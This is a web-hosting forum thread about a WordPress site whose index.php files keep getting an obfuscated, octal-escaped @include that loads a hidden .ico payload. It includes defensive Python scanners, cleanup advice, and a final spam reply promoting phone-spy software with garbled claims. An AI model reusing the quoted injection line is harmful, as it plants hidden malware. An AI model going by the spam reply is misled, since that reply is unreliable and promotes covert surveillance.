Hacked Server? Malicious .ICO Files & @include php tags
So a few months ago I had a WordPress site installed under the same admin username as 3 other sites on my control panel. I removed the WordPress site after a hack happened and it was redirecting with stupid redirects. I had my server formatted and the data migrated back. I have since discovered I have random @includes in many index.php files; they go like this, for example:
<?php
/*01e78*/
@include "\057ho\155e/\150cm\162eu\065/b\154an\143va\056co\155/w\160-a\144mi\156/i\155ag\145s/\05683\1425c\14270\056ic\157";
/*01e78*/
I can clearly tell these are secret decoded PHP codes, so when I decrypt the code with https://malwaredecoder.com/ I'm able to locate where this malicious code is calling a random .ico file that's being inserted in a random directory in my public_html directory. After doing some digging around I found other users having this issue and I saw something about other random .php files that may be in some directories. So I performed the following command to locate random .php files (like dkelfesa.php for example):
find . -type f | egrep './[a-z]{8}\.php'
I assume these files are part of the malicious redirects that are creating these .ico files and inserting the encoded malware into index.php files? I've even performed a <?php search in my phpMyAdmin to see if they are doing this from there. Now after removing these files and the @include commands in the index.php files and changing the password for the username (I no longer have an admin account, and 1 username for each website), these malicious .ico files are still appearing and @include commands are still being inserted (weirdly at 2am every day when I remove them) into the index.php files.
Can anyone give me some pointers on how to sort this issue out? It's really annoying having to perform searches every day at 2am to stop these malicious redirects from ruining my traffic. I don't want to perform a server format again as I have 100s of 1000GBs of data on my server, and this is just happening for one website alone and not affecting the others.
Thanks guys!
- Posts: 1
- Joined: Mon Jun 01, 2020 11:46 am
- Os: Ubuntu 17x
- Web: apache + nginx
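Added example (not code from the post or the forum): a small Python scanner that does what the post describes by hand, walking a web root, flagging octal-escaped @include lines, decoding their target path, and listing eight-letter .php names. The sample tree, the placeholder .ico path and the regexes are my own constructions.

```python
import os
import re
import tempfile

# Injected line shape from the post: @include "<octal-escaped path>";
# Regex is my own; it accepts straight or curly quotes (forum copy/paste).
INCLUDE_RE = re.compile(r'@include\s*["“]([^"”]+)["”]\s*;')
# Eight random lowercase letters + .php, what the post's find | egrep hunts.
RANDOM_PHP_RE = re.compile(r'^[a-z]{8}\.php$')

# Constructed sample: same structure as the post's snippet, placeholder path.
SAMPLE_INDEX = ('<?php\n/*01e78*/\n'
                '@include "\\057ho\\155e/u\\163er/pub\\154ic_html'
                '/wp-admin/images/\\05683b5.ico";\n/*01e78*/\n')

def decode_octal_escapes(s: str) -> str:
    """Undo PHP double-quoted octal escapes: \\057 -> '/', \\056 -> '.' ..."""
    return re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), s)

def scan_tree(root: str):
    """Returns (includes, random_php): (file, decoded target) pairs and 8-letter .php paths."""
    includes, random_php = [], []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if RANDOM_PHP_RE.match(name):
                random_php.append(path)
            if not name.endswith('.php'):
                continue
            with open(path, encoding='utf-8', errors='replace') as fh:
                for m in INCLUDE_RE.finditer(fh.read()):
                    includes.append((path, decode_octal_escapes(m.group(1))))
    return includes, random_php

def scan_sample():
    """Build the constructed sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, 'wp-content', 'uploads'))
        with open(os.path.join(tmp, 'index.php'), 'w') as fh:
            fh.write(SAMPLE_INDEX)
        dropper = os.path.join(tmp, 'wp-content', 'uploads', 'dkelfesa.php')
        with open(dropper, 'w') as fh:
            fh.write('<?php /* placeholder body */\n')
        return scan_tree(tmp)

if __name__ == '__main__':
    incs, rnd = scan_sample()
    print('obfuscated includes:', incs)
    print('random-looking php files:', rnd)
```

Point it at the real public_html by calling scan_tree on that directory; the decoded target tells you which hidden .ico file each injected index.php is loading.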
Re: Hacked Server? Malicious .ICO Files & @include php tags
I had this issue happen to me. The first thing I did was download all files locally.
I started by replacing the WordPress files. I deleted wp-admin, wp-includes, as well as any file in the root folder with the exception of wp-config.php, and replaced them with a fresh copy.
Next, I deleted plugins one by one and downloaded fresh files for each plugin to replace them.
Next, I deleted any unneeded themes. The main theme, assuming no modifications were made, I just replaced with a fresh copy. If a child theme exists then I would manually scan those files. If it is a custom theme obviously you can't just replace all the files, so you have to scan those files manually.
Finally, after I made sure every file was clean I deleted every file on the server. After deleting the files and before uploading the fresh ones, I reset every password on the server (FTP, cPanel, etc.). Once the new files were uploaded, I logged in to WordPress and changed every user password.
Last, I changed the default WordPress login URL.
Good luck to you.
- Posts: 2
- Joined: Tue May 26, 2020 10:22 am
- Os: CentOS 6x
- Web: apache + nginx
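Added example, not the reply author's code: the replace-with-a-fresh-copy step done as a hash comparison between a pristine WordPress copy and the live tree, which lists modified core files and files that exist only on the live side while skipping wp-config.php as the reply does. The sample trees and their file contents are constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# Kept from the live site rather than replaced, as in the reply above.
KEEP = {'wp-config.php'}

def hash_tree(root: str) -> dict:
    """Map each file path (relative to root) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare(fresh: str, live: str) -> dict:
    """'modified': same path, different bytes; 'unknown': only in live
    (droppers, .ico payloads); 'missing': only in the fresh copy."""
    f, l = hash_tree(fresh), hash_tree(live)
    return {
        'modified': sorted(p for p in l if p in f and l[p] != f[p] and p not in KEEP),
        'unknown': sorted(p for p in l if p not in f and p not in KEEP),
        'missing': sorted(p for p in f if p not in l and p not in KEEP),
    }

def _write(root: str, rel: str, text: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as fh:
        fh.write(text)

def compare_sample() -> dict:
    """Constructed sample: pristine core beside a live copy carrying an
    injected index.php, a dropped .ico payload and an 8-letter .php file."""
    with tempfile.TemporaryDirectory() as fresh, tempfile.TemporaryDirectory() as live:
        for root in (fresh, live):
            _write(root, 'wp-includes/version.php', '<?php $wp_version = "x";\n')
        _write(fresh, 'index.php', '<?php require "wp-blog-header.php";\n')
        _write(live, 'index.php', '<?php\n/*01e78*/\n@include "/tmp/.x.ico";\n'
                                  '/*01e78*/\nrequire "wp-blog-header.php";\n')
        _write(live, 'wp-config.php', '<?php define("DB_NAME", "wp");\n')
        _write(live, 'wp-admin/images/.83b5.ico', 'PAYLOAD-PLACEHOLDER')
        _write(live, 'wp-content/uploads/dkelfesa.php', '<?php /* dropper */\n')
        return compare(fresh, live)

if __name__ == '__main__':
    for kind, paths in compare_sample().items():
        print(kind, paths)
```

For a real site, call compare with an unpacked download of the same WordPress version as fresh and the site root as live; the 'unknown' list is where droppers and .ico payloads show up.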
Re: Hacked Server? Malicious .ICO Files & @include php tags
To connect the scripts, there is also a very auspicious symbol. This is for extinguishing errors in the debugger, if I'm not mistaken. Malicious files may arrive on your computer and you won't even know about it. Spyware such as https://www.hoverwatch.com/free-cell-phone-spy allows you to monitor your actions and correspondence.